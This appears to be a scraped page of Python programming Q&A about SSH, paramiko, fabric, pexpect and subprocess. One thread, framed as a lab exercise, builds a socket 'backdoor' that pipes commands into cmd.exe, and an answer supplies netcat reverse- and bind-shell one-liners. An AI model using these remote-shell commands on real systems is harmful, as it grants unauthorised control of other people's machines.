ssh into aws server and edit hosts file - python

My code:
For some reason this seems to infinite loop and repeatedly print 'here2' and the output of 'ls -lah'. Is there something bleedingly obvious I'm doing wrong?
def update_hosts_file(public_dns,hosts_file_info):
for dns in public_dns:
print 'here2'
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # wont require saying 'yes' to new fingerprint
key_path = os.path.join(os.path.expanduser(KEY_DIR), KEY_NAME)+'.pem'
ssh.connect(dns,username='ubuntu',key_filename=key_path)
ssh.exec_command('touch testing')
a,b,c=ssh.exec_command("ls -lah")
print b.readlines()
a,b,c=ssh.exec_command("file = open('/home/ubuntu/hosts', 'w')")
#print b.readlines()
ssh.exec_command("file.write('127.0.0.1 localhost\n')")
for tag,ip in hosts_file_info.iteritems():
ssh.exec_command("file.write('%s %s\n' % (ip,tag))")
ssh.exec_command("file.close()")
ssh.close()
public_dns = 'ec2-xx-xxx-xxx-xxx.compute-1.amazonaws.com'
print public_dns
hosts_file_info = {}
#hosts_file_info['1']='test'
#hosts_file_info['2']='test2'
#hosts_file_info['3']='test3'
#print hosts_file_info
update_hosts_file(public_dns,hosts_file_info)

Your first problem is that public_dns is a string, so for dns in public_dns: will iterate over the characters of that string. You'll try the code with 'e', then with 'c', then with '2', and so on. That's not an infinite loop, but it's a loop of length 42, and I could easily see you getting bored and canceling it before that finishes.
If you only want a single server, you still need a list of strings, it's just that the list will only have one string, like this:
public_dns = ['ec2-xx-xxx-xxx-xxx.compute-1.amazonaws.com']
Your next problem is that your ssh code doesn't make any sense. You're trying to execute Python statements, like file = open('/home/ubuntu/hosts', 'w'), as if they were bash commands. In bash, that command is a syntax error, because you can't use parentheses that way in shell scripts. And if you fixed that, it would just be a call to the file command, which would complain about not being able to find a file named =. You could upload a Python script to the remove server and then run it, embed one via a <<HERE, or try to script the interactive Python interpreter, but you can't just run Python code in the bash interpreter.
On top of that, exec_command starts a command, and immediately returns you the stdin/stdout/stderr channels. It doesn't wait until the command is finished. So, you can't sequence up multiple commands by just doing a,b,c = ssh.exec_command(…) one after another.
So, how could you fix this? It really makes more sense to start over again than to try to figure out what each part of this was intended to do and how to make it work.
As far as I can tell, on each machine, you're trying to create a new file, whose contents are based only on data you have locally, and the same on all machine. So, why even try to run code on each remote machine that creates that file? Just create it locally, once, and upload it to each remote machine—e.g., with Paramiko's sftp. Something like this (obviously untested, because I don't have your data, server credentials, etc.):
hosts = ['127.0.0.1 localhost\n']
for ip, tag in hosts_file_info.iteritems():
hosts.append('%s %s\n' % (ip,tag))
for dns in public_dns:
ssh = paramiko.SSHClient()
# etc. up to connect
sftp = paramiko.SFTPClient.from_transport(ssh.get_transport())
f = sftp.open('/home/ubuntu/hosts', 'w')
f.writelines(hosts)
f.close()

You're looping through every letter in the public_dns variable. You probably want something like this:
public_dns = ['ec2-xx-xxx-xxx-xxx.compute-1.amazonaws.com']

Related

Run script for send in-game Terraria server commands

In the past week I install a Terraria 1.3.5.3 server into an Ubuntu v18.04 OS, for playing online with friends. This server should be powered on 24/7, without any GUI, only been accessed by SSH on internal LAN.
My friends ask me if there is a way for them to control the server, e.g. send a message, via internal in-game chat, so I thought use a special character ($) in front of the desired command ('$say something' or '$save', for instance) and a python program, that read the terminal output via pipe, interpreter the command and send it back with a bash command.
I follow these instructions to install the server:
https://www.linode.com/docs/game-servers/host-a-terraria-server-on-your-linode
And config my router to forward a dedicated port to the terraria server.
All is working fine, but I really struggle to make python send a command via "terrariad" bash script, described in the link above.
Here is a code used to send a command, in python:
import subprocess
subprocess.Popen("terrariad save", shell=True)
This works fine, but if I try to input a string with space:
import subprocess
subprocess.Popen("terrariad \"say something\"", shell=True)
it stop the command in the space char, output this on the terminal:
: say
Instead of the desired:
: say something
<Server>something
What could I do to solve this problem?
I tried so much things but I get the same result.
P.S. If I send the command manually in the ssh putty terminal, it works!
Edit 1:
I abandoned the python solution, by now I'll try it with bash instead, seem to be more logic to do this way.
Edit 2:
I found the "terrariad" script expect just one argument, but the Popen is splitting my argument into two no matter the method I use, as my input string has one space char in the middle. Like this:
Expected:
terrariad "say\ something"
$1 = "say something"
But I get this of python Popen:
subprocess.Popen("terrariad \"say something\"", shell=True)
$1 = "say
$2 = something"
No matter i try to list it:
subprocess.Popen(["terrariad", "say something"])
$1 = "say
$2 = something"
Or use \ quote before the space char, It always split variables if it reach a space char.
Edit 3:
Looking in the bash script I could understand what is going on when I send a command... Basically it use the command "stuff", from the screen program, to send characters to the terraria screen session:
screen -S terraria -X stuff $send
$send is a printf command:
send="`printf \"$*\r\"`"
And it seems to me that if I run the bash file from Python, it has a different result than running from the command line. How this is possible? Is this a bug or bad implementation of the function?
Thanks!
I finally come with a solution to this, using pipes instead of the Popen solution.
It seems to me that Popen isn't the best solution to run bash scripts, as described in How to do multiple arguments with Python Popen?, the link that SiHa send in the comments (Thanks!):
"However, using Python as a wrapper for many system commands is not really a good idea. At the very least, you should be breaking up your commands into separate Popens, so that non-zero exits can be handled adequately. In reality, this script seems like it'd be much better suited as a shell script.".
So I came with the solution, using a fifo file:
First, create a fifo to be use as a pipe, in the desired directory (for instance, /samba/terraria/config):
mkfifo cmdOutput
*/samba/terraria - this is the directory I create in order to easily edit the scripts, save and load maps to the server using another computer, that are shared with samba (https://linuxize.com/post/how-to-install-and-configure-samba-on-ubuntu-18-04/)
Then I create a python script to read from the screen output and then write to a pipe file (I know, probably there is other ways to this):
import shlex, os
outputFile = os.open("/samba/terraria/config/cmdOutput", os.O_WRONLY )
print("python script has started!")
while 1:
line = input()
print(line)
cmdPosition = line.find("&")
if( cmdPosition != -1 ):
cmd = slice(cmdPosition+1,len(line))
cmdText = line[cmd]
os.write(outputFile, bytes( cmdText + "\r\r", 'utf-8'))
os.write(outputFile, bytes("say Command executed!!!\r\r", 'utf-8'))
Then I edit the terraria.service file to call this script, piped from terrariaServer, and redirect the errors to another file:
ExecStart=/usr/bin/screen -dmS terraria /bin/bash -c "/opt/terraria/TerrariaServer.bin.x86_64 -config /samba/terraria/config/serverconfig.txt < /samba/terraria/config/cmdOutput 2>/samba/terraria/config/errorLog.txt | python3 /samba/terraria/scripts/allowCommands.py"
*/samba/terraria/scripts/allowCommands.py - where my script is.
**/samba/terraria/config/errorLog.txt - save Log of errors in a file.
Now I can send commands, like 'noon' or 'dawn' so I can change the in-game time, save world and backup it with samba server before boss fights, do another stuff if I have some time XD, and have the terminal showing what is going on with the server.

Incremental stdout out of fabric

I'm new to fabric and want to run a long-running script on a remote computer, so far, I have been using something like this:
import fabric
c = fabric.Connection("192.168.8.16") # blocking
result = c.run("long-running-script-outputing-state-information-into-stdout.py")
Is there a way to read stdout as it comes asynchronously instead of using the 'result' object that can be used only after the command has finished?
If you want to use fabric to do some stuff remotely, you have first of all follow this structure to make a connection:
#task(hosts=["servername"])
def do_things(c):
with connection(host=host, user=user,) as c:
c.run("long-running-script-outputing-state-information-into-stdout.py")
This will output the whole output regardless what you are doing!
you have to use with connection(host=host, user=user,) as c: to ensure that everything you run will run within that connection context!

Python Subprocess SSH closes connection

I have a function that uses the subprocess module to connect to a server via SSH.
# python 3
def foo():
menu = ["1 = one.com",
"2 = two.com",
"3 = three.com"
]
for item in menu:
print(item)
choice = input("Which host?: ")
if choice == "1":
user = "users-name"
host = "one.com"
port = "22"
subprocess.Popen(['ssh', user + '#' + host, '-p', port])
elif
...
...
foo()
When I run the script, it connects to the server but then terminates the connection after I press any key. It just kind of, drops the connection silently and goes back to typing on localhost.
Is subprocess not meant to handle a concurrent connection? I am merely asking it to connect and do nothing else. Advice, tips, suggestions?
There could be multiple answers to this, but assuming your command line, configuration and credentials are all correct and the ssh call on its own would succeed, the problem is (also a assuming a bit what happens in your code, or if the above example is more or less complete) following:
You fork and execute ssh (that's what Popen did), but your parent process (script) continues to run and eventually finishes, and when it does, it also clobbers the child it started, hence dropping you back to your hosts console even though you might have seen the other machine's prompt.
If I understands your intention correctly, you can do the following:
child = subprocess.Popen(['ssh', user + '#' + host, '-p', port])
child.wait()
Or just use a different method of starting your ssh such as check_call() that will hand control over to the child process and wait until its done..
Hope this helps.
Now when I see the above snippet, I cannot resits to give some unsolicited style advice/hints that can hopefully make your life a bit easier. I would just have a list of choices:
choices = [("one.com", "one_com_user", "one_com_port"), ...]
And generate the menu entries out of that... based on your input (converted to int, e.g. as entered), you could use choices[entered] to call ssh as wanted with corresponding arguments in the list and handle IndexError / out of range values with whatever response you wanted to do in case user specified unknown value.
That would make your code more concise (no conditional clauses), as well as easier to read and maintain (all hosts information in one place).
And one more regarding sshcall. You can skip concatenating strings and stick to list of arguments as you otherwise already do. ..., user + '#' + host, ... and ..., '-l', user, host, .... Should work with (hopefully) most ssh clients.

python pexpect connected to server how to get the exact output of commands

In python I am connecting to a different server using
child = pexpect.spawn('ssh username#systemname')
once it is connected, I would like to execute some other commands. how to get the exact output of other child commands like?
child.sendline("hostname")
or Let me know if there is another way to do this.
You may try the following and it would write to the filename mentioned:
child.sendline('hostname')
child.logfile_read = open("<filename>", 'a')
child.expect('<what ever you expect after the command execution>')

python subprocess stdin.write a string error 22 invalid argument

i have two python files communicating with socket. when i pass the data i took to stdin.write i have error 22 invalid argument. the code
a="C:\python27\Tools"
proc = subprocess.Popen('cmd.exe', cwd=a ,universal_newlines = True, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
data = s.recv(1024) # s is the socket i created
proc.stdin.write(data) ##### ERROR in this line
output = proc.stdout.readline()
print output.rstrip()
remainder = proc.communicate()[0]
print remainder
Update
OK basically i want to create something like a backdoor on a system, in a localhost inside a network lab. this is for educational purpose. i have two machines. 1) is running ubuntu and i have the in server this code:
import socket,sys
s=socket.socket()
host = "192.168.2.7" #the servers ip
port = 1234
s.bind((host, port))
s.listen(1) #wait for client connection.
c, addr = s.accept() # Establish connection with client.
print 'Got connection from', addr
c.send('Thank you for connecting')
while True:
command_from_user = raw_input("Give your command: ") #read command from the user
if command_from_user == 'quit': break
c.send(command_from_user) #sending the command to client
c.close() # Close the connection
have this code for the client:
import socket
import sys
import subprocess, os
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Socket created'
host = "192.168.2.7" #ip of the server machine
port = 1234
s.connect((host,port)) #open a TCP connection to hostname on the port
print s.recv(1024)
a="C:\python27\Tools"
proc = subprocess.Popen('cmd.exe', cwd=a ,universal_newlines = True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
while True:
data = s.recv(1024)
if (data == "") or (data=="quit"):
break
proc.stdin.write('%s\n' % data)
proc.stdin.flush()
remainder = proc.communicate()[0]
print remainder
stdoutput=proc.stdout.read() + proc.stderr.read()
s.close #closing the socket
and the error is in the client file
Traceback (most recent call last): File "ex1client2.py", line 50, in proc.stdin.write('%s\n' % data) ValueError: I/O operation on closed file
basically i want to run serial commands from the server to the client and get the output back in the server. the first command is executed, the second command i get this error message.
The main problem which led me to this solution is with chanhing directory command. when i excecute cd "path" it doesn't change.
Your new code has a different problem, which is why it raises a similar but different error. Let's look at the key part:
while True:
data = s.recv(1024)
if (data == "") or (data=="quit"):
break
proc.stdin.write('%s\n' % data)
proc.stdin.flush()
remainder = proc.communicate()[0]
print remainder
stdoutput=proc.stdout.read() + proc.stderr.read()
The problem is that each time through this list, you're calling proc.communicate(). As the docs explain, this will:
Send data to stdin. Read data from stdout and stderr, until end-of-file is reached. Wait for process to terminate.
So, after this call, the child process has quit, and the pipes are all closed. But the next time through the loop, you try to write to its input pipe anyway. Since that pipe has been closed, you get ValueError: I/O operation on closed file, which means exactly what it says.
If you want to run each command in a separate cmd.exe shell instance, you have to move the proc = subprocess.Popen('cmd.exe', …) bit into the loop.
On the other hand, if you want to send commands one by one to the same shell, you can't call communicate; you have to write to stdin, read from stdout and stderr until you know they're done, and leave everything open for the next time through the loop.
The downside of the first one is pretty obvious: if you do a cd \Users\me\Documents in the first command, then dir in the second command, and they're running in completely different shells, you're going to end up getting the directory listing of C:\python27\Tools rather than C:\Users\me\Documents.
But the downside of the second one is pretty obvious too: you need to write code that somehow either knows when each command is done (maybe because you get the prompt again?), or that can block on proc.stdout, proc.stderr, and s all at the same time. (And without accidentally deadlocking the pipes.) And you can't even toss them all into a select, because the pipes aren't sockets. So, the only real option is to create a reader thread for stdout and another one for stderr, or to get one of the async subprocess libraries off PyPI, or to use twisted or another framework that has its own way of doing async subprocess pipes.
If you look at the source to communicate, you can see how the threading should work.
Meanwhile, as a side note, your code has another very serious problem. You're expecting that each s.recv(1024) is going to return you one command. That's not how TCP sockets work. You'll get the first 2-1/2 commands in one recv, and then 1/4th of a command in the next one, and so on.
On localhost, or even a home LAN, when you're just sending a few small messages around, it will work 99% of the time, but you still have to deal with that 1% or your code will just mysteriously break sometimes. And over the internet, and even many real LANs, it will only work 10% of the time.
So, you have to implement some kind of protocol that delimits messages in some way.
Fortunately, for simple cases, Python gives you a very easy solution to this: makefile. When commands are delimited by newlines, and you can block synchronously until you've got a complete command, this is trivial. Instead of this:
while True:
data = s.recv(1024)
… just do this:
f = s.makefile()
while True:
data = f.readline()
You just need to remember to close both f and s later (or s right after the makefile, and f later). A more idiomatic use is:
with s.makefile() as f:
s.close()
for data in f:
One last thing:
OK basically i want to create something like a backdoor on a system, in a localhost inside a network lab
"localhost" means the same machine you're running one, so "a localhost inside a network lab" doesn't make sense. I assume you just meant "host" here, in which case the whole thing makes sense.
If you don't need to use Python, you can do this whole thing with a one-liner using netcat. There are a few different versions with slightly different syntax. I believe Ubuntu comes with GNU netcat built-in; if not, it's probably installable with apt-get netcat or apt-get nc. Windows doesn't come with anything, but you can get ports of almost any variant.
A quick google for "netcat remote shell" turned up a bunch of blog posts, forum messages, and even videos showing how to do this, such as Using Netcat To Spawn A Remote Shell, but you're probably better off googling for netcat tutorials instead.
The more usual design is to have the "backdoor" machine (your Windows box) listen on a port, and the other machine (your Ubuntu) connect to it, so that's what most of the blog posts/etc. will show you. The advantage of this direction is that your "backyard server" listens forever—you can connect up, do some stuff, quit, connect up again later, etc. without having to go back to the Windows box and start a new connection.
But the other way around, with a backyard client on the Windows box, is just as easy. On your Ubuntu box, start a server that just connects the terminal to the first connection that comes in:
nc -l -p 1234
Then on your Windows box, make a connection to that server, and connect it up to cmd.exe. Assuming you've installed a GNU-syntax variant:
nc -e cmd.exe 192.168.2.7 1234
That's it. A lot simpler than writing it in Python.
For the more typical design, the backdoor server on Windows runs this:
nc -k -l -p 1234 -e cmd.exe
And then you connect up from Ubuntu with:
nc windows.machine.address 1234
Or you can even add -t to the backdoor server, and just connect up with telnet instead of nc.
The problem is that you're not actually opening a subprocess at all, so the pipe is getting closed, so you're trying to write to something that doesn't exist. (I'm pretty sure POSIX guarantees that you'll get an EPIPE here, but on Windows, subprocess isn't using a POSIX pipe in the first place, so there's no guarantee of exactly what you're going to get. But you're definitely going to get some error.)
And the reason that happens is that you're trying to open a program named '\n' (as in a newline, not a backslash and an n). I don't think that's even legal on Windows. And, even if it is, I highly doubt you have an executable named '\n.exe' or the like on your path.
This would be much easier to see if you weren't using shell=True. In that case, the Popen itself would raise an exception (an ENOENT), which would tell you something like:
OSError: [Errno 2] No such file or directory: '
'
… which would be much easier to understand.
In general, you should not be using shell=True unless you really need some shell feature. And it's very rare that you need a shell feature and also need to manually read and write the pipes.
It would also be less confusing if you didn't reuse data to mean two completely different things (the name of the program to run, and the data to pass from the socket to the pipe).

Categories

Resources